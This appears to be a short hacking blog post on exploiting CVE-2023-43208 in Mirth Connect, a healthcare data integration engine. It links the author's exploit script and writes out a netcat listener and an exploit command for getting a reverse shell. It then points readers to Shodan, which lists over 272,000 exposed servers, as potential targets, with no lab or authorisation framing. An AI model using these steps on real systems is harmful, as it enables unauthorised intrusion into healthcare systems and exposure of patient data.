Mirth Connect RCE: When Healthcare Data Meets Insecure Defaults.
From version detection to reverse shell: exploiting critical vulnerabilities in Mirth Connect.
What is Mirth Connect?
Mirth Connect is a healthcare integration engine developed by NextGen Healthcare that streamlines the exchange of health information by transforming and routing data in various formats like HL7 and DICOM between different healthcare systems.
Now that we understand Mirth Connect's role in healthcare, let's dive into the exploitation process.
Before we start hacking, let’s explain CVE-2023-43208.
CVE-2023-43208 is a critical authentication bypass vulnerability in Mirth Connect that allows unauthenticated attackers to access the administrative interface and potentially execute arbitrary code.
What are the affected versions?
Mirth Connect versions prior to 4.4.0, it specifically affects versions 4.1.1, 4.2.0, 4.3.0 and earlier.
The Vulnerability
The vulnerability exists in the authentication mechanism, the application fails to properly validate sessions tokens, this means that attackers can access the admin functions without any credentials.
Exploitation steps
I wrote a PoC that can check a single target and a list of targets for vulnerabilities.
You can download it here: https://github.com/gotr00t0day/NextGen-Mirth Connect-Exploit
As you can see in the picture above, I found a few Mirth Connect servers that might be vulnerable to CVE-2023-43208.
From here you can try and access the admin interface without creds at /api/users. Or you can try and use the exploit and get a reverse shell.
If you use the exploit, for a reverse shell, make sure you use the proper flags and arguments.
Start a netcat listener: nc -lvp 1337
Run the PoC:
python3 mirthconnect_exploit.py -t IP -p PORT -lh localhost -lp 1337 --exploit
If you’re lucky, you should see a connection back on your netcat listener.
Finding vulnerable servers in shodan
As you can see in the image above, there are 272,724 potential targets, a lot of these are running vulnerable versions.